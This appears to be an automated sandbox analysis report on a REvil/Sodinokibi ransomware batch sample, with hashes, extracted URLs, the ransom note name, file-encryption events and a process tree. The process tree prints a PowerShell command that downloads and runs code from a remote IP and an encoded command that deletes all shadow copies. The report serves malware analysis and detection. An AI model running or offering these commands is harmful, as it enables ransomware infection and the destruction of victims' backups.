Analysis
-
max time kernel
88s -
max time network
100s -
platform
windows10_x64 -
resource
win10 -
submitted
18-08-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
257963fd8d55fc6eb395408d6cd8eb10.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
257963fd8d55fc6eb395408d6cd8eb10.bat
Resource
win10
General
-
Target
257963fd8d55fc6eb395408d6cd8eb10.bat
-
Size
216B
-
MD5
db422fe5e7b4c0a610a166c2521c5b0b
-
SHA1
4df900c107ef17b5d139be2fb8792908a137c1e2
-
SHA256
2b9bf7f85b20bc24437ed489cc2b0c2d4ccf0b13baa34e27568ae61d1f67a31f
-
SHA512
c19beefe11cd9b28d379f33f04061f1a75f52b017cc835997470344c27bb0274a1f555d4f89180183a5168113cd984a682e5db5e1afb5d6fd0eab3e511388f5b
Malware Config
Extracted
http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10
Extracted
C:\16t307lqae-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD18DF36649D5926
http://decryptor.cc/FD18DF36649D5926
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 3520 powershell.exe -
Modifies extensions of user files 15 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\CompressSend.tiff powershell.exe File renamed C:\Users\Admin\Pictures\CompressSend.tiff => \??\c:\users\admin\pictures\CompressSend.tiff.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\RemoveCompress.raw => \??\c:\users\admin\pictures\RemoveCompress.raw.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\ResetResume.tif => \??\c:\users\admin\pictures\ResetResume.tif.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\StopUnpublish.tif => \??\c:\users\admin\pictures\StopUnpublish.tif.16t307lqae powershell.exe File opened for modification \??\c:\users\admin\pictures\UnlockSelect.tiff powershell.exe File renamed C:\Users\Admin\Pictures\UnlockSelect.tiff => \??\c:\users\admin\pictures\UnlockSelect.tiff.16t307lqae powershell.exe File opened for modification \??\c:\users\admin\pictures\NewRevoke.tiff powershell.exe File renamed C:\Users\Admin\Pictures\DenyLock.png => \??\c:\users\admin\pictures\DenyLock.png.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\GrantPush.raw => \??\c:\users\admin\pictures\GrantPush.raw.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\NewRevoke.tiff => \??\c:\users\admin\pictures\NewRevoke.tiff.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\EditSubmit.raw => \??\c:\users\admin\pictures\EditSubmit.raw.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\MountUnlock.tif => \??\c:\users\admin\pictures\MountUnlock.tif.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\TraceGroup.tif => \??\c:\users\admin\pictures\TraceGroup.tif.16t307lqae powershell.exe File renamed C:\Users\Admin\Pictures\WaitConvert.raw => \??\c:\users\admin\pictures\WaitConvert.raw.16t307lqae powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\aa88q71.bmp" powershell.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\RedoUnpublish.crw powershell.exe File opened for modification \??\c:\program files\SendUninstall.xhtml powershell.exe File opened for modification \??\c:\program files\GetRedo.ppsm powershell.exe File opened for modification \??\c:\program files\NewUnprotect.dotx powershell.exe File opened for modification \??\c:\program files\RegisterInstall.ps1xml powershell.exe File opened for modification \??\c:\program files\RenameSearch.ini powershell.exe File opened for modification \??\c:\program files\SplitRestart.nfo powershell.exe File opened for modification \??\c:\program files\LimitFormat.rtf powershell.exe File created \??\c:\program files (x86)\16t307lqae-readme.txt powershell.exe File opened for modification \??\c:\program files\SearchOptimize.zip powershell.exe File opened for modification \??\c:\program files\SwitchRevoke.pcx powershell.exe File opened for modification \??\c:\program files\UninstallConvert.M2V powershell.exe File opened for modification \??\c:\program files\UnlockStart.rm powershell.exe File created \??\c:\program files\16t307lqae-readme.txt powershell.exe File opened for modification \??\c:\program files\PingStep.emz powershell.exe File opened for modification \??\c:\program files\ConnectComplete.odp powershell.exe File opened for modification \??\c:\program files\EnterUninstall.dib powershell.exe File opened for modification \??\c:\program files\OpenRequest.ex_ powershell.exe File opened for modification \??\c:\program files\SearchBlock.vssm powershell.exe File opened for modification \??\c:\program files\SyncResume.ppt powershell.exe File opened for modification \??\c:\program files\AddFind.pdf powershell.exe File opened for modification \??\c:\program files\DenyFormat.avi powershell.exe File opened for modification \??\c:\program files\DisablePush.xsl powershell.exe File opened for modification \??\c:\program files\SetConnect.rle powershell.exe File opened for modification \??\c:\program files\ShowUnlock.jpg powershell.exe File opened for modification \??\c:\program files\SplitUnblock.crw powershell.exe File opened for modification \??\c:\program files\UninstallPop.xltx powershell.exe File opened for modification \??\c:\program files\CompressDismount.bmp powershell.exe File opened for modification \??\c:\program files\GroupEdit.mp4v powershell.exe File opened for modification \??\c:\program files\NewLimit.vssx powershell.exe File opened for modification \??\c:\program files\RenameCompress.wvx powershell.exe File opened for modification \??\c:\program files\RestoreBlock.dwg powershell.exe File opened for modification \??\c:\program files\SuspendGrant.jtx powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 3520 powershell.exe 3520 powershell.exe 3520 powershell.exe 3520 powershell.exe 3520 powershell.exe 968 powershell.exe 968 powershell.exe 968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 968 powershell.exe Token: SeBackupPrivilege 1284 vssvc.exe Token: SeRestorePrivilege 1284 vssvc.exe Token: SeAuditPrivilege 1284 vssvc.exe Token: SeTakeOwnershipPrivilege 3520 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 4048 wrote to memory of 3520 4048 cmd.exe powershell.exe PID 4048 wrote to memory of 3520 4048 cmd.exe powershell.exe PID 4048 wrote to memory of 3520 4048 cmd.exe powershell.exe PID 3520 wrote to memory of 968 3520 powershell.exe powershell.exe PID 3520 wrote to memory of 968 3520 powershell.exe powershell.exe PID 3520 wrote to memory of 968 3520 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\257963fd8d55fc6eb395408d6cd8eb10.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10');Invoke-CXEMWXSCI;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1284